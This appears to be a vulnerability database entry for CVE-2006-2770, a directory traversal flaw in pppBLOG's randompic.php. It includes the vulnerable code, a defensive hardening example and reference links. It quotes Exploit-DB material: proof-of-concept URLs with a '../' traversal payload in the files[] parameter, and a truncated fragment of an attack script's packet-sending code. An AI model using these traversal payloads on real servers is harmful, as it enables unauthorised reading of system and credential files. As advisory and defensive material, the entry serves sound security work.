CVE-2006-2770
Published 2006-06-02
Priority P4 · 30 · medium · 5.4 CVSS 2.0
AV:N/AC:H/Au:N/C:C/I:N/A:N
EXPLOIT
EPSS: 3.48% (87.6th percentile)
Directory traversal vulnerability in randompic.php in pppBLOG 0.3.8 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) sequence in an index of the "file" array parameter, as demonstrated by file[0].
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pppblog | pppblog | <= 0.3.8 | — |
No detection rules found.
Exploit-DB
pppBlog 0.3.11 - File Disclosure
exploitdb·2008-11-03
---
# pppBlog <= 0.3.11 (randompic.php) System File Disclosure Vulnerability
# url: http://sourceforge.net/projects/pppblog/
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purposes. Use it at your own risk.
# Author will not be responsible for any damage.
#
# In memory of rgod ;)
*Requirements: register_globals = On
vulnerable code in randompic.php at lines 66-72:
```php
...
header("Content-Type: image/gif");
header("Content-Transfer-Encoding: binary");
if (is_array($files)){
    if (is_file($files[$randnum])){
        readfile("$dir/$files[$randnum]");
    }
}
...
```
poc[0] = randompic.php?files[0]=[file]
poc[1] = randompic.php?files[0]=../../../../../../../../.
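The excerpt above passes an entry of `$files` to `readfile()`, and with register_globals on the request can supply that array. A hardened version of that step, added here as an example and not taken from pppBLOG or the advisory: it assumes the image list should come only from the server-side directory, and `resolve_inside`, `pick_random_image` and the temp-directory demo are hypothetical, constructed names and data.

```php
<?php
// Added example (not pppBLOG code). Function names and the demo
// directory are hypothetical; the demo files are constructed.

/** Resolve $name under $base; return null if it escapes or is not a file. */
function resolve_inside(string $base, string $name): ?string
{
    $root = realpath($base);
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($root === false || $path === false) {
        return null;
    }
    // After realpath() the ".." segments and symlinks are resolved, so a
    // prefix comparison against the root directory is meaningful.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $inside = strncmp($path, $prefix, strlen($prefix)) === 0;
    return ($inside && is_file($path)) ? $path : null;
}

/** Pick a random GIF from $dir using a list built on the server only. */
function pick_random_image(string $dir): ?string
{
    // Always initialised here, so a request-supplied files[] array
    // (register_globals) cannot pre-populate the candidate list.
    $files = [];
    foreach (scandir($dir) ?: [] as $name) {
        if (preg_match('/\.gif\z/i', $name) && resolve_inside($dir, $name) !== null) {
            $files[] = $name;
        }
    }
    if ($files === []) {
        return null;
    }
    return resolve_inside($dir, $files[random_int(0, count($files) - 1)]);
}

// Constructed demo: one image inside a temp directory, one file outside it.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'randompic_demo_' . getmypid();
$outside = 'outside_' . getmypid() . '.txt';
mkdir($dir);
file_put_contents($dir . '/a.gif', 'GIF89a');
file_put_contents($dir . '/../' . $outside, 'not an image');

var_dump(resolve_inside($dir, 'a.gif') !== null);       // file inside the directory
var_dump(resolve_inside($dir, '../' . $outside));        // dot-dot name from outside
var_dump(pick_random_image($dir) === realpath($dir . '/a.gif'));

unlink($dir . '/a.gif'); unlink($dir . '/../' . $outside); rmdir($dir);
```

Disabling register_globals removes the injection path entirely; the containment check still matters wherever a file name can be influenced by input.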
Exploit-DB
pppBlog 0.3.8 - System Disclosure
exploitdb·2006-05-31
---
```php
#!/usr/bin/php -q -d short_open_tag=on
126 ))
   {$result.=" .";}
   else
   {$result.=" ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]."
```
No writeups or analysis indexed.
http://retrogod.altervista.org/pppblog_038_xpl.html
http://secunia.com/advisories/20375
http://securityreason.com/securityalert/1015
http://securitytracker.com/id?1016198
http://www.securityfocus.com/archive/1/435406/100/0/threaded
http://www.securityfocus.com/bid/18189
http://www.vupen.com/english/advisories/2006/2085
https://exchange.xforce.ibmcloud.com/vulnerabilities/26969